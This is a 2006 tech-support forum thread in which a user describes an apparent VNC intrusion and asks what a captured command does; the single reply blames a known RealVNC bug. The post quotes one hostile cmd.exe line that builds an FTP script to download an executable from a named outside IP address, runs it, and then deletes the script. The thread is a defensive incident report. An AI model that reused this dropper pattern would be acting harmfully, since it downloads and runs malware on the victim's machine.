Go Premium for a chance to win a PS4. Enter to Win

x
?
Solved

I got hacked. Found this command,

Posted on 2006-11-09
1
Medium Priority
?
288 Views
Last Modified: 2010-03-05
I was trouble shooting a time out issue with my internet connection.  During this process I disconnected my switch, then I took my router of the mix.  At this point , my PC was connected directly to my DSL modem.  After 15 minutes past I walked away from my pc for 2 minutes.  I came back to find my VNC icon Black, which means someon was connected, and my Symantec Auto Protect box up on the screen.  I immediatly closed the VNC session.  I then went to run a netstat to see if someone was connected and noticed this string in the command window.

cmd.exe /c del i&echo open 66.16.176.238 12680 > i&echo user 1 1 >> i &echo get 357.exe >> i &echo quit >> i &ftp -n -s:i &357.exe&del i&exit

That same IP address was the ip address that connected to my computer via VNC.  I found it on the event viewer.
I then checked the symantec log and it shows that it blocked the w32.spybot.worm.  Here is what I am guessing.
This bunghole connected to my machine, someone how got into my VNC, and attempted to download a virus, but Norton caught it.

Can anyone tell me for sure what the above command does?
0
Comment
Question by:steveLaMi
1 Comment
 
LVL 47

Accepted Solution

by:
rpggamergirl earned 2000 total points
ID: 17910951
There are 2 or 3 questions already with similar issues and theirs were caused by the RealVNC bug of some version.

Here's one of the question I found:
http://www.experts-exchange.com/Operating_Systems/WinXP/Q_22051676.html#17903231
0

Featured Post

Put Machine Learning to Work--Protect Your Clients

Machine learning means Smarter Cybersecurity™ Solutions.
As technology continues to advance, managing and analyzing massive data sets just can’t be accomplished by humans alone. It requires huge amounts of memory and storage, as well as the high-speed power of the cloud.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Sometimes Administrators rights are not enough. These cases call for the SYSTEM account. The process in this article outlines the steps required to execute commands using the SYSTEM account.
Tech spooks aren't just for those who are tech savvy, it also happens to those of us running a business. Check out the top tech spooks for business owners.
We’ve all felt that sense of false security before—locking down external access to a database or component and feeling like we’ve done all we need to do to secure company data. But that feeling is fleeting. Attacks these days can happen in many w…
In a question here at Experts Exchange (https://www.experts-exchange.com/questions/29062564/Adobe-acrobat-reader-DC.html), a member asked how to create a signature in Adobe Acrobat Reader DC (the free Reader product, not the paid, full Acrobat produ…

783 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question